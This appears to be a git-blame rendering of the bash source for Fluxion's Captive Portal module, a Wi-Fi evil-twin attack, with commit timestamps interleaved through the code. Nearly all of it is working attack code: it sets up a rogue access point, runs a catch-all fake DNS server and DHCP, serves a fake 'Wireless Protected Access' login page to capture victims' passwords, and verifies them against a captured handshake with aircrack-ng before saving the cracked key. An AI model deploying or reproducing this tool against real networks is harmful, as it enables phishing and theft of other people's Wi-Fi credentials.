2017-08-08 12:48:00 -06:00
#!/bin/bash
############################# < Captive Portal Parameters > ############################
CaptivePortalState = "Not Ready"
CaptivePortalPassLog = " $FLUXIONPath /attacks/Captive Portal/pwdlog "
CaptivePortalNetLog = " $FLUXIONPath /attacks/Captive Portal/netlog "
CaptivePortalJamTime = "9999999999999"
CaptivePortalAuthenticationMethods = ( "hash" ) # "wpa_supplicant")
CaptivePortalAuthenticationMethodsInfo = ( " (handshake file, ${ CGrn } recommended $CClr ) " ) # "(Target AP authentication, slow)")
########################### < Virtual Network Configuration > ##########################
# To avoid collapsing with an already connected network, we'll use an uncommon network.
VIGWAddress = "192.168.254.1"
VIGWNetwork = ${ VIGWAddress %.* }
2017-09-02 13:28:45 -06:00
function captive_portal_unset_interface( ) {
if [ ! " $WIAccessPoint " ] ; then return 1; fi
if interface_is_wireless " $WIAccessPoint "
then fluxion_unset_ap_service
fi
# Remove any previously created fluxion AP interfaces.
iw dev " $WIAccessPoint " del & > $FLUXIONOutputDevice
WIAccessPoint = ""
}
function captive_portal_set_interface( ) {
2017-09-02 14:35:51 -06:00
if [ " $WIAccessPoint " ] ; then return 0; fi
2017-09-02 13:28:45 -06:00
captive_portal_unset_interface
# Gather candidate interfaces.
echo -e " $FLUXIONVLine $FLUXIONFindingWINotice "
# List of all valid network interfaces.
interface_list_real
local ifAlternate = ( " $FLUXIONGeneralRepeatOption " )
local ifAlternateInfo = ( "" )
local ifAlternateState = ( "" )
local ifAlternateColor = ( " $CClr " )
2017-09-02 14:35:51 -06:00
interface_prompt " $FLUXIONVLine $CaptivePortalInterfaceQuery " InterfaceListWireless[ @] \
2017-09-02 13:28:45 -06:00
ifAlternate[ @] ifAlternateInfo[ @] ifAlternateState[ @] ifAlternateColor[ @]
# If the monitor interface is also the AP interface,
# there's no need to reserve it again, just add it.
if [ " $InterfacePromptIfSelected " = = " $WIMonitor " ] ; then
if ! captive_portal_run_interface " $InterfacePromptIfSelected "
then return 1
fi
WIAccessPoint = " $CaptivePortalRunInterface "
else
if ! fluxion_run_interface " $InterfacePrompt "
then return 2
fi
WIAccessPoint = " $FluxionRunInterface "
fi
# Set an AP service if the interface selected is wireless.
if interface_is_wireless " $WIAccessPoint " ; then
if ! fluxion_set_ap_service
then captive_portal_unset_interface; return 1
fi
fi
}
function captive_portal_run_interface( ) {
if [ ! " $1 " ] ; then return 1; fi
# Create an identifier for the access point, AP virtual interface.
local wiAccessPoint = " FX ${ 1 : 2 } AP "
# Find interface's physical device.
if ! interface_physical " $1 "
then echo -e " $FLUXIONVLine $FLUXIONPhysicalWIDeviceUnknownError " ; sleep 5; return 1
fi
local wiAccessPointDevice = " $InterfacePhysical "
# Create the new virtual interface with the generated identifier.
2017-09-02 14:35:51 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartingInterfaceNotice "
2017-09-02 13:28:45 -06:00
if ! iw phy $wiAccessPointDevice interface add $wiAccessPoint type monitor 2> $FLUXIONOutputDevice ; then
2017-09-02 14:35:51 -06:00
echo -e " $FLUXIONVLine $CaptivePortalCannotStartInterfaceError "
2017-09-02 13:28:45 -06:00
sleep 5
return 3
fi
2017-09-02 14:35:51 -06:00
echo -e " $FLUXIONVLine $CaptivePortalStartedInterfaceNotice "
sleep 3
2017-09-02 13:28:45 -06:00
CaptivePortalRunInterface = " $wiAccessPoint "
}
2017-08-08 12:48:00 -06:00
function captive_portal_unset_auth( ) {
if [ ! " $APRogueAuthMode " ] ; then return 0; fi
if [ " $APRogueAuthMode " = "hash" ] ; then
2017-09-02 13:28:45 -06:00
fluxion_unset_hash
2017-08-08 12:48:00 -06:00
fi
APRogueAuthMode = ""
# If we've only got one option, then the user skipped this
# section by taking that one option, so we unset the previous
# phase along with this one to take the user properly back.
if [ ${# CaptivePortalAuthenticationMethods [@] } -le 1 ] ; then
2017-09-02 14:35:51 -06:00
captive_portal_unset_interface
2017-08-08 12:48:00 -06:00
fi
}
function captive_portal_set_auth( ) {
if [ " $APRogueAuthMode " ] ; then
echo "Captive Portal authentication mode is already set, skipping!" > $FLUXIONOutputDevice
return 0;
fi
captive_portal_unset_auth
if [ ${# CaptivePortalAuthenticationMethods [@] } -eq 1 -o \
2017-08-16 00:01:51 -06:00
${# CaptivePortalAuthenticationMethods [@] } -ge 1 -a " $FLUXIONAuto " ] ; then
2017-08-08 12:48:00 -06:00
APRogueAuthMode = " ${ CaptivePortalAuthenticationMethods [0] } "
else
fluxion_header
2017-08-10 21:02:12 -06:00
echo -e " $FLUXIONVLine $CaptivePortalVerificationMethodQuery "
2017-08-08 12:48:00 -06:00
echo
view_target_ap_info
2017-08-10 21:02:12 -06:00
local choices = ( " ${ CaptivePortalAuthenticationMethods [@] } " " $FLUXIONGeneralBackOption " )
2017-08-08 12:48:00 -06:00
io_query_format_fields "" " \t $CRed [ $CYel %d $CRed ] $CClr %b %b\n " choices[ @] \
CaptivePortalAuthenticationMethodsInfo[ @]
2017-08-12 20:23:22 -06:00
echo
2017-08-08 12:48:00 -06:00
APRogueAuthMode = " ${ IOQueryFormatFields [0] } "
2017-08-10 21:02:12 -06:00
if [ [ " $APRogueAuthMode " = " $FLUXIONGeneralBackOption " ] ] ; then
2017-08-08 12:48:00 -06:00
captive_portal_unset_auth
return 1
fi
fi
if [ " $APRogueAuthMode " = "hash" ] ; then
2017-09-02 13:28:45 -06:00
fluxion_set_hash
2017-08-08 12:48:00 -06:00
fi
if [ [ $? -ne 0 ] ] ; then captive_portal_unset_auth; return 1; fi
}
function captive_portal_run_certificate_generator( ) {
2017-08-18 01:39:52 -06:00
xterm -bg "#000000" -fg "#CCCCCC" -title "Generating Self-Signed SSL Certificate" -e openssl req -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout " $FLUXIONWorkspacePath /server.pem " -out " $FLUXIONWorkspacePath /server.pem " # more details there https://www.openssl.org/docs/manmaster/apps/openssl.html
2017-08-09 18:31:32 -06:00
chmod 400 " $FLUXIONWorkspacePath /server.pem "
2017-08-08 12:48:00 -06:00
}
function captive_portal_unset_cert( ) {
sandbox_remove_workfile " $FLUXIONWorkspacePath /server.pem "
}
# Create Self-Signed SSL Certificate
function captive_portal_set_cert( ) {
# Check existance of ssl certificate with file size > 0
2017-08-09 18:31:32 -06:00
if [ -f " $FLUXIONPath /attacks/Captive Portal/certificate/server.pem " -a \
-s " $FLUXIONPath /attacks/Captive Portal/certificate/server.pem " ] ; then
cp " $FLUXIONPath /attacks/Captive Portal/certificate/server.pem " \
" $FLUXIONWorkspacePath /server.pem "
2017-08-08 12:48:00 -06:00
fi
# Check existance of ssl certificate with file size > 0
2017-08-09 18:31:32 -06:00
if [ -f " $FLUXIONWorkspacePath /server.pem " -a -s " $FLUXIONWorkspacePath /server.pem " ] ; then
2017-08-08 12:48:00 -06:00
echo "Captive Portal certificate is already set, skipping!" > $FLUXIONOutputDevice
return 0;
fi
captive_portal_unset_cert
2017-08-16 00:01:51 -06:00
if [ " $FLUXIONAuto " ] ; then
captive_portal_run_certificate_generator
else
local choices = ( " $CaptivePortalCertificateSourceGenerateOption " " $CaptivePortalCertificateSourceRescanOption " " $FLUXIONGeneralBackOption " )
while [ ! -f " $FLUXIONWorkspacePath /server.pem " -o ! -s " $FLUXIONWorkspacePath /server.pem " ] ; do
io_query_choice " $CaptivePortalCertificateSourceQuery " choices[ @]
echo
case " $IOQueryChoice " in
" $CaptivePortalCertificateSourceGenerateOption " ) captive_portal_run_certificate_generator; break; ;
" $CaptivePortalCertificateSourceRescanOption " ) return 2; ;
" $FLUXIONGeneralBackOption " )
captive_portal_unset_auth
captive_portal_unset_cert
return 1; ;
*) conditional_bail; return 3; ;
esac
done
fi
2017-08-08 12:48:00 -06:00
}
function captive_portal_unset_site( ) {
sandbox_remove_workfile " $FLUXIONWorkspacePath /captive_portal "
}
function captive_portal_set_site( ) {
2017-08-09 18:31:32 -06:00
if [ -d " $FLUXIONWorkspacePath /captive_portal " ] ; then
2017-08-08 12:48:00 -06:00
echo "Captive Portal site (interface) is already set, skipping!" > $FLUXIONOutputDevice
return 0;
fi
2017-08-10 21:02:12 -06:00
captive_portal_unset_site
2017-08-08 12:48:00 -06:00
2017-08-18 17:21:24 -06:00
local sites = ( )
# Attempt adding only if the directory exists.
2017-08-22 13:28:23 -06:00
if [ -d attacks/Captive\ Portal/generic/languages ] ; then
2017-08-18 17:21:24 -06:00
# Retrieve all generic sites available.
2017-08-21 09:18:31 -06:00
for site in attacks/Captive\ Portal/generic/languages/*.lang; do
sites += ( " ${ CaptivePortalGenericInterfaceOption } _`basename " ${ site %.lang } "`" )
2017-08-18 17:21:24 -06:00
done
fi
# Attempt adding only if the directory exists.
if [ -d attacks/Captive\ Portal/sites ] ; then
# Retrieve all available portal sites and
# store them without the .portal extension.
for site in attacks/Captive\ Portal/sites/*.portal; do
2017-08-21 09:18:31 -06:00
sites += ( "`basename " ${ site %.portal } "`" )
2017-08-18 17:21:24 -06:00
done
fi
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
local sitesIdentifier = ( " ${ sites [@]/_*/ } " " $FLUXIONGeneralBackOption " )
2017-08-08 12:48:00 -06:00
local sitesLanguage = ( " ${ sites [@]/*_/ } " )
2017-08-13 03:24:18 -06:00
format_center_dynamic " $CRed [ $CYel %02d $CRed ] $CClr %-44b $CBlu %10s $CClr "
local queryFieldOptionsFormat = $FormatCenterDynamic
2017-08-08 12:48:00 -06:00
fluxion_header
2017-09-02 14:35:51 -06:00
echo -e " $FLUXIONVLine $CaptivePortalUIQuery "
2017-08-16 13:47:56 -06:00
echo
2017-08-08 12:48:00 -06:00
view_target_ap_info
2017-08-16 13:47:56 -06:00
io_query_format_fields "" " $queryFieldOptionsFormat \n " \
2017-08-13 03:24:18 -06:00
sitesIdentifier[ @] sitesLanguage[ @]
2017-08-08 12:48:00 -06:00
2017-08-12 20:23:22 -06:00
echo
2017-08-08 12:48:00 -06:00
local site = " ${ IOQueryFormatFields [0] } "
local siteLanguage = " ${ IOQueryFormatFields [1] } "
local sitePath = " ${ site } _ ${ siteLanguage } "
case " $site " in
2017-08-10 21:02:12 -06:00
" $CaptivePortalGenericInterfaceOption " )
2017-08-21 09:18:31 -06:00
source " $FLUXIONPath /attacks/Captive Portal/generic/languages/ $siteLanguage .lang "
2017-08-08 20:37:52 -06:00
captive_portal_generic; ;
2017-08-10 21:02:12 -06:00
" $FLUXIONGeneralBackOption " )
2017-08-08 12:48:00 -06:00
captive_portal_unset_cert
captive_portal_unset_site
return 1; ;
* )
2017-08-10 21:02:12 -06:00
cp -r " $FLUXIONPath /attacks/Captive Portal/sites/ $sitePath .portal " \
" $FLUXIONWorkspacePath /captive_portal "
2017-08-15 18:36:19 -06:00
2017-08-15 18:57:04 -06:00
find " $FLUXIONWorkspacePath /captive_portal/ " -type f -exec sed -i -e 's/$APTargetSSID/' " ${ APTargetSSID // \/ / \\ \/ } " '/g; s/$APTargetMAC/' " ${ APTargetMAC // \/ / \\ \/ } " '/g; s/$APTargetChannel/' " ${ APTargetChannel // \/ / \\ \/ } " '/g' { } \; ; ;
2017-08-08 12:48:00 -06:00
esac
}
function captive_portal_unset_attack( ) {
sandbox_remove_workfile " $FLUXIONWorkspacePath /captive_portal_authenticator.sh "
2017-08-20 20:38:53 -06:00
sandbox_remove_workfile " $FLUXIONWorkspacePath /fluxion_captive_portal_dns.py "
2017-08-08 12:48:00 -06:00
sandbox_remove_workfile " $FLUXIONWorkspacePath /lighttpd.conf "
sandbox_remove_workfile " $FLUXIONWorkspacePath /dhcpd.leases "
sandbox_remove_workfile " $FLUXIONWorkspacePath /captive_portal/check.php "
2017-08-10 21:02:12 -06:00
sandbox_remove_workfile " $FLUXIONWorkspacePath /captive_portal "
2017-08-08 12:48:00 -06:00
2017-08-10 21:02:12 -06:00
# Only reset the AP if one has been defined.
2017-08-08 12:48:00 -06:00
if [ $( type -t ap_reset) ] ; then
ap_reset
fi
}
# Create different settings required for the script
function captive_portal_set_attack( ) {
# AP Service: Prepare service for an attack.
ap_prep
2017-08-15 13:30:04 -06:00
# Add the PHP authenticator scripts, used to verify
2017-08-08 12:48:00 -06:00
# password attempts from users using the web interface.
2017-08-15 13:30:04 -06:00
local authenticatorFiles = ( "authenticator.php" "check.php" "update.php" )
2017-08-15 18:57:04 -06:00
2017-08-15 13:30:04 -06:00
for authenticatorFile in " ${ authenticatorFiles [@] } " ; do
cp " $FLUXIONPath /attacks/Captive Portal/lib/ $authenticatorFile " \
" $FLUXIONWorkspacePath /captive_portal/ $authenticatorFile "
2017-08-15 18:57:04 -06:00
sed -i -e 's/\$FLUXIONWorkspacePath/' " ${ FLUXIONWorkspacePath // \/ / \\ \/ } " '/g' \
2017-08-15 13:30:04 -06:00
" $FLUXIONWorkspacePath /captive_portal/ $authenticatorFile "
chmod u+x " $FLUXIONWorkspacePath /captive_portal/ $authenticatorFile "
done
2017-08-08 12:48:00 -06:00
# Generate the dhcpd configuration file, which is
# used to provide DHCP service to APRogue clients.
echo " \
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet $VIGWNetwork .0 netmask 255.255.255.0 {
option broadcast-address $VIGWNetwork .255;
option routers $VIGWAddress ;
option subnet-mask 255.255.255.0;
option domain-name-servers $VIGWAddress ;
range $VIGWNetwork .100 $VIGWNetwork .254;
} \
2017-08-09 18:31:32 -06:00
" > " $FLUXIONWorkspacePath /dhcpd.conf"
2017-08-08 12:48:00 -06:00
#create an empty leases file
2017-08-09 18:31:32 -06:00
touch " $FLUXIONWorkspacePath /dhcpd.leases "
2017-08-08 12:48:00 -06:00
# Generate configuration for a lighttpd web-server.
echo " \
server.document-root = \" $FLUXIONWorkspacePath /captive_portal/\"
server.modules = (
\" mod_access\" ,
\" mod_alias\" ,
\" mod_accesslog\" ,
\" mod_fastcgi\" ,
\" mod_redirect\" ,
\" mod_rewrite\"
)
fastcgi.server = (
\" .php\" = > (
(
\" bin-path\" = > \" /usr/bin/php-cgi\" ,
\" socket\" = > \" /php.socket\"
)
)
)
server.port = 80
server.pid-file = \" /var/run/lighttpd.pid\"
# server.username = \"www\"
# server.groupname = \"www\"
mimetype.assign = (
\" .html\" = > \" text/html\" ,
\" .htm\" = > \" text/html\" ,
\" .txt\" = > \" text/plain\" ,
\" .jpg\" = > \" image/jpeg\" ,
\" .png\" = > \" image/png\" ,
\" .css\" = > \" text/css\"
)
server.error-handler-404 = \" /\"
static-file.exclude-extensions = (
\" .fcgi\" ,
\" .php\" ,
\" .rb\" ,
\" ~\" ,
\" .inc\"
)
index-file.names = (
\" index.htm\" ,
\" index.html\"
)
\$ SERVER[ \" socket\" ] = = \" :443\" {
ssl.engine = \" enable\"
ssl.pemfile = \" $FLUXIONWorkspacePath /server.pem\"
}
#Redirect www.domain.com to domain.com
\$ HTTP[ \" host\" ] = ~ \" ^www\. ( .*) $\" {
url.redirect = ( \" ^/( .*) \" = > \" http://%1/\$ 1\" )
}
2017-08-09 18:31:32 -06:00
" > " $FLUXIONWorkspacePath /lighttpd.conf"
2017-08-08 12:48:00 -06:00
# Create a DNS service with python, forwarding all traffic to gateway.
echo " \
import socket
class DNSQuery:
def __init__( self, data) :
self.data= data
self.dominio= ''
tipo = ( ord( data[ 2] ) >> 3) & 15
if tipo = = 0:
ini = 12
lon = ord( data[ ini] )
while lon != 0:
self.dominio+= data[ ini+1:ini+lon+1] +'.'
ini += lon+1
lon = ord( data[ ini] )
def respuesta( self, ip) :
packet = ''
if self.dominio:
packet += self.data[ :2] + \" \x 81\x 80\"
packet += self.data[ 4:6] + self.data[ 4:6] + '\x00\x00\x00\x00'
packet += self.data[ 12:]
packet += '\xc0\x0c'
packet += '\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
packet += str.join( '' ,map( lambda x: chr( int( x) ) , ip.split( '.' ) ) )
return packet
if __name__ = = '__main__' :
ip = '$VIGWAddress'
print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip
udps = socket.socket( socket.AF_INET, socket.SOCK_DGRAM)
udps.bind( ( '' ,53) )
try:
while 1:
data, addr = udps.recvfrom( 1024)
p = DNSQuery( data)
udps.sendto( p.respuesta( ip) , addr)
print 'Request: %s -> %s' % ( p.dominio, ip)
except KeyboardInterrupt:
print 'Finalizando'
udps.close( ) \
2017-08-20 20:38:53 -06:00
" > " $FLUXIONWorkspacePath /fluxion_captive_portal_dns.py"
2017-08-08 12:48:00 -06:00
2017-08-20 20:38:53 -06:00
chmod +x " $FLUXIONWorkspacePath /fluxion_captive_portal_dns.py "
2017-08-08 12:48:00 -06:00
# Attack arbiter script
echo " \
#!/bin/bash
function signal_stop_attack( ) {
kill -s SIGABRT $$ # Signal STOP ATTACK
2017-08-18 10:12:38 -06:00
handle_abort_authenticator
2017-08-08 12:48:00 -06:00
}
function handle_abort_authenticator( ) {
AuthenticatorState = \" aborted\"
}
trap signal_stop_attack SIGINT SIGHUP
trap handle_abort_authenticator SIGABRT
2017-08-09 18:31:32 -06:00
echo > \" $FLUXIONWorkspacePath /candidate.txt\"
echo -n \" 0\" > \" $FLUXIONWorkspacePath /hit.txt\"
echo > \" $FLUXIONWorkspacePath /wpa_supplicant.log\"
2017-08-08 12:48:00 -06:00
# Make console cursor invisible, cnorm to revert.
tput civis
clear
m = 0
h = 0
s = 0
i = 0
AuthenticatorState = \" running\"
startTime = \$ ( date +%s)
while [ \$ AuthenticatorState = \" running\" ] ; do
let s = \$ ( date +%s) -\$ startTime
d = \` expr \$ s / 86400\`
s = \` expr \$ s % 86400\`
h = \` expr \$ s / 3600\`
s = \` expr \$ s % 3600\`
m = \` expr \$ s / 60\`
s = \` expr \$ s % 60\`
if [ \" \$ s\" -le 9 ] ; then
is = \" 0\"
else
is =
fi
if [ \" \$ m\" -le 9 ] ; then
im = \" 0\"
else
im =
fi
if [ \" \$ h\" -le 9 ] ; then
ih = \" 0\"
else
ih =
fi
2017-08-09 18:31:32 -06:00
if [ -f \" $FLUXIONWorkspacePath /pwdattempt.txt\" -a -s \" $FLUXIONWorkspacePath /pwdattempt.txt\" ] ; then
# Assure we've got a directory to store pwd logs into.
if [ ! -d \" $CaptivePortalPassLog \" ] ; then
mkdir -p \" $CaptivePortalPassLog \"
fi
2017-08-08 12:48:00 -06:00
# Save any new password attempt.
2017-08-09 18:31:32 -06:00
cat \" $FLUXIONWorkspacePath /pwdattempt.txt\" >> \" $CaptivePortalPassLog /$APTargetSSID -$APTargetMAC .log\"
2017-08-08 12:48:00 -06:00
# Clear logged password attempt.
2017-08-09 18:31:32 -06:00
echo -n > \" $FLUXIONWorkspacePath /pwdattempt.txt\"
2017-08-08 12:48:00 -06:00
fi
2017-08-09 18:31:32 -06:00
" >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
if [ $APRogueAuthMode = "hash" ] ; then
echo "
2017-08-09 18:31:32 -06:00
if [ -f \" $FLUXIONWorkspacePath /candidate_result.txt\" ] ; then
2017-08-08 12:48:00 -06:00
# Check if we've got the correct password by looking for anything other than \"Passphrase not in\".
2017-08-09 18:31:32 -06:00
if ! aircrack-ng -w \" $FLUXIONWorkspacePath /candidate.txt\" \" $FLUXIONWorkspacePath /$APTargetSSIDClean -$APTargetMAC .cap\" | grep -qi \" Passphrase not in\" ; then
echo \" 2\" > \" $FLUXIONWorkspacePath /candidate_result.txt\"
2017-08-08 12:48:00 -06:00
break
else
2017-08-09 18:31:32 -06:00
echo \" 1\" > \" $FLUXIONWorkspacePath /candidate_result.txt\"
2017-08-08 12:48:00 -06:00
fi
2017-08-09 18:31:32 -06:00
fi " >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
elif [ $APRogueAuthMode = "wpa_supplicant" ] ; then
echo "
2017-08-09 18:31:32 -06:00
wpa_passphrase \" $APTargetSSID \" \" \` cat \" $FLUXIONWorkspacePath /candidate.txt\" \` \" > \" $FLUXIONWorkspacePath /wpa_supplicant.conf\"
wpa_supplicant -i \" $WIAccessPoint \" -c \" $FLUXIONWorkspacePath /wpa_supplicant.conf\" -f \" $FLUXIONWorkspacePath /wpa_supplicant.log\" &
2017-08-08 12:48:00 -06:00
wpaSupplicantPID = \$ !
# Shitty design...
sleep 5
2017-08-09 18:31:32 -06:00
if [ -f \" $FLUXIONWorkspacePath /candidate_result.txt\" ] ; then
if grep -i 'WPA: Key negotiation completed' \" $FLUXIONWorkspacePath /wpa_supplicant.log\" ; then
echo \" 2\" > \" $FLUXIONWorkspacePath /candidate_result.txt\"
2017-08-08 12:48:00 -06:00
break
else
2017-08-09 18:31:32 -06:00
echo \" 1\" > \" $FLUXIONWorkspacePath /candidate_result.txt\"
2017-08-08 12:48:00 -06:00
fi
2017-08-09 18:31:32 -06:00
fi " >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
fi
echo "
DHCPClients = ( $( nmap -PR -sn -n -oG - $VIGWNetwork .100-110 2>& 1 | grep Host) )
echo
echo -e \" ACCESS POINT:\"
2017-08-20 13:04:22 -06:00
echo -e \" SSID ...........: $CWht $APTargetSSID $CClr \"
echo -e \" MAC ............: $CYel $APTargetMAC $CClr \"
echo -e \" Channel ........: $CWht $APTargetChannel $CClr \"
echo -e \" Vendor .........: $CGrn ${ APTargetMaker :- UNKNOWN } $CClr \"
echo -e \" Runtime ........: $CBlu \$ ih\$ h:\$ im\$ m:\$ is\$ s$CClr \"
echo -e \" Attempts .......: $CRed \$ ( cat $FLUXIONWorkspacePath /hit.txt) $CClr \"
echo -e \" Clients ........: $CBlu \$ ( cat $FLUXIONWorkspacePath /clients.txt | grep DHCPACK | awk '{print \$5}' | sort| uniq | wc -l) $CClr \"
2017-08-08 12:48:00 -06:00
echo
echo -e \" CLIENTS ONLINE:\"
x = 0
for client in \" \$ { DHCPClients[ @] } \" ; do
x = \$ ( ( \$ x+1) )
ClientIP = \$ ( echo \$ client| cut -d \" \" -f2)
ClientMAC = \$ ( nmap -PR -sn -n \$ ClientIP 2>& 1 | grep -i mac | awk '{print \$3}' | tr [ :upper:] [ :lower:] )
if [ \" \$ ( echo \$ ClientMAC| wc -m) \" != \" 18\" ] ; then
ClientMAC = \" xx:xx:xx:xx:xx:xx\"
fi
ClientMID = \$ ( macchanger -l | grep \" \$ ( echo \" \$ ClientMAC\" | cut -d \" :\" -f -3) \" | cut -d \" \" -f 5-)
if echo \$ ClientMAC| grep -q x; then
ClientMID = \" unknown\"
fi
2017-08-09 18:31:32 -06:00
ClientHostname = \$ ( grep \$ ClientIP \" $FLUXIONWorkspacePath /clients.txt\" | grep DHCPACK | sort | uniq | head -1 | grep '(' | awk -F '(' '{print \$2}' | awk -F ')' '{print \$1}' )
2017-08-08 12:48:00 -06:00
echo -e \" $CGrn \$ x) $CRed \$ ClientIP $CYel \$ ClientMAC $CClr ( $CBlu \$ ClientMID$CClr ) $CGrn \$ ClientHostname$CClr \"
done
2017-08-09 18:31:32 -06:00
echo -ne \" \0 33[ K\0 33[ u\" " >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
if [ $APRogueAuthMode = "hash" ] ; then
echo "
2017-08-09 18:31:32 -06:00
sleep 1" >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
elif [ $APRogueAuthMode = "wpa_supplicant" ] ; then
echo "
killall \$ wpaSupplicantPID & > $FLUXIONOutputDevice
2017-08-09 18:31:32 -06:00
" >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
fi
echo "
done
if [ \$ AuthenticatorState = \" aborted\" ] ; then exit 1; fi
clear
2017-08-09 18:31:32 -06:00
echo \" 1\" > \" $FLUXIONWorkspacePath /status.txt\"
2017-08-08 12:48:00 -06:00
# sleep 7
sleep 3
signal_stop_attack
# killall mdk3 &> $FLUXIONOutputDevice
# killall aireplay-ng &> $FLUXIONOutputDevice
# killall airbase-ng &> $FLUXIONOutputDevice
2017-08-20 20:38:53 -06:00
# kill \$(ps a | grep python | grep fluxion_captive_portal_dns.py | awk '{print \$1}') &> $FLUXIONOutputDevice
2017-08-08 12:48:00 -06:00
# killall hostapd &> $FLUXIONOutputDevice
# killall lighttpd &> $FLUXIONOutputDevice
# killall dhcpd &> $FLUXIONOutputDevice
# if [ \"$APRogueAuthMode\" = \"wpa_supplicant\" ]; then
# killall wpa_supplicant &> $FLUXIONOutputDevice
# fi
# killall wpa_passphrase &> $FLUXIONOutputDevice
2017-08-09 18:31:32 -06:00
# Assure we've got a directory to store net logs into.
if [ ! -d \" $CaptivePortalNetLog \" ] ; then
mkdir -p \" $CaptivePortalNetLog \"
fi
2017-08-08 12:48:00 -06:00
echo \"
FLUXION $FLUXIONVersion
SSID: $APTargetSSID
BSSID: $APTargetMAC ( $APTargetMaker )
Channel: $APTargetChannel
Security: $APTargetEncryption
Time: \$ ih\$ h:\$ im\$ m:\$ is\$ s
Password: \$ ( cat $FLUXIONWorkspacePath /candidate.txt)
2017-08-09 18:31:32 -06:00
\" >\" $CaptivePortalNetLog /$APTargetSSID -$APTargetMAC .log\" " >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
if [ $APRogueAuthMode = "hash" ] ; then
echo "
2017-08-09 18:31:32 -06:00
aircrack-ng -a 2 -b $APTargetMAC -0 -s \" $FLUXIONWorkspacePath /$APTargetSSIDClean -$APTargetMAC .cap\" -w \" $FLUXIONWorkspacePath /candidate.txt\" && echo && echo -e \" The password was saved in " $CRed " $CaptivePortalNetLog /$APTargetSSID -$APTargetMAC .log" $CClr " \" \
" >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
elif [ $APRogueAuthMode = "wpa_supplicant" ] ; then
echo "
echo -e \" The password was saved in " $CRed " $CaptivePortalNetLog /$APTargetSSID -$APTargetMAC .log" $CClr " \" \
2017-08-09 18:31:32 -06:00
" >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
fi
2017-08-09 18:31:32 -06:00
chmod +x " $FLUXIONWorkspacePath /captive_portal_authenticator.sh "
2017-08-08 12:48:00 -06:00
}
# Generate the contents for a generic web interface
function captive_portal_generic( ) {
2017-08-09 18:31:32 -06:00
if [ ! -d " $FLUXIONWorkspacePath /captive_portal " ] ; then
mkdir " $FLUXIONWorkspacePath /captive_portal "
2017-08-08 12:48:00 -06:00
fi
2017-08-21 09:18:31 -06:00
base64 -d " $FLUXIONPath /attacks/Captive Portal/generic/assets " > " $FLUXIONWorkspacePath /file.zip "
2017-08-08 12:48:00 -06:00
2017-08-09 18:31:32 -06:00
unzip " $FLUXIONWorkspacePath /file.zip " -d " $FLUXIONWorkspacePath /captive_portal " & >$FLUXIONOutputDevice
2017-08-08 12:48:00 -06:00
sandbox_remove_workfile " $FLUXIONWorkspacePath /file.zip "
echo " \
<!DOCTYPE html>
<html>
<head>
<meta charset = \" UTF-8\" >
<meta name = \" viewport\" content = \" width = device-width, height = device-height, initial-scale= 1.0\" >
<title>Wireless Protected Access: Verifying</title>
<!-- Styles -->
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/jquery.mobile-1.4.5.min.css\" />
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/main.css\" />
<!-- Scripts -->
<script src = \" js/jquery-1.11.1.min.js\" ></script>
<script src = \" js/jquery.mobile-1.4.5.min.js\" ></script>
</head>
<body>
<!-- final page -->
<div id = \" done \" data-role= \" page\" data-theme= \" a\" >
<div data-role= \" main\" class = \" ui-content ui-body ui-body-b\" dir = \" $DIALOG_WEB_DIR \" >
<h3 style = \" text-align:center; \" >$DIALOG_WEB_OK </h3>
</div>
</div>
</body>
2017-08-09 18:31:32 -06:00
</html>" > " $FLUXIONWorkspacePath /captive_portal/final.html"
2017-08-08 12:48:00 -06:00
echo " \
<!DOCTYPE html>
<html>
<head>
<meta charset = \" UTF-8\" >
<meta name = \" viewport\" content = \" width = device-width, height = device-height, initial-scale= 1.0\" >
<title>Wireless Protected Access: Key Mismatch</title>
<!-- Styles -->
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/jquery.mobile-1.4.5.min.css\" />
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/main.css\" />
<!-- Scripts -->
<script src = \" js/jquery-1.11.1.min.js\" ></script>
<script src = \" js/jquery.mobile-1.4.5.min.js\" ></script>
<script src = \" js/jquery.validate.min.js\" ></script>
<script src = \" js/additional-methods.min.js\" ></script>
</head>
<body>
<!-- Error page -->
<div data-role= \" page\" data-theme= \" a\" >
<div data-role= \" main\" class = \" ui-content ui-body ui-body-b\" dir = \" $DIALOG_WEB_DIR \" >
<h3 style = \" text-align:center; \" >$DIALOG_WEB_ERROR </h3>
<a href = \" index.html\" class = \" ui-btn ui-corner-all ui-shadow\" onclick = \" location.href= 'index.html' \" >$DIALOG_WEB_BACK </a>
</div>
</div>
</body>
2017-08-09 18:31:32 -06:00
</html>" > " $FLUXIONWorkspacePath /captive_portal/error.html"
2017-08-08 12:48:00 -06:00
echo " \
<!DOCTYPE html>
<html>
<head>
<meta charset = \" UTF-8\" >
<meta name = \" viewport\" content = \" width = device-width, height = device-height, initial-scale= 1.0\" >
<title>Wireless Protected Access: Login</title>
<!-- Styles -->
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/jquery.mobile-1.4.5.min.css\" />
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/main.css\" />
<!-- Scripts -->
<script src = \" js/jquery-1.11.1.min.js\" ></script>
<script src = \" js/jquery.mobile-1.4.5.min.js\" ></script>
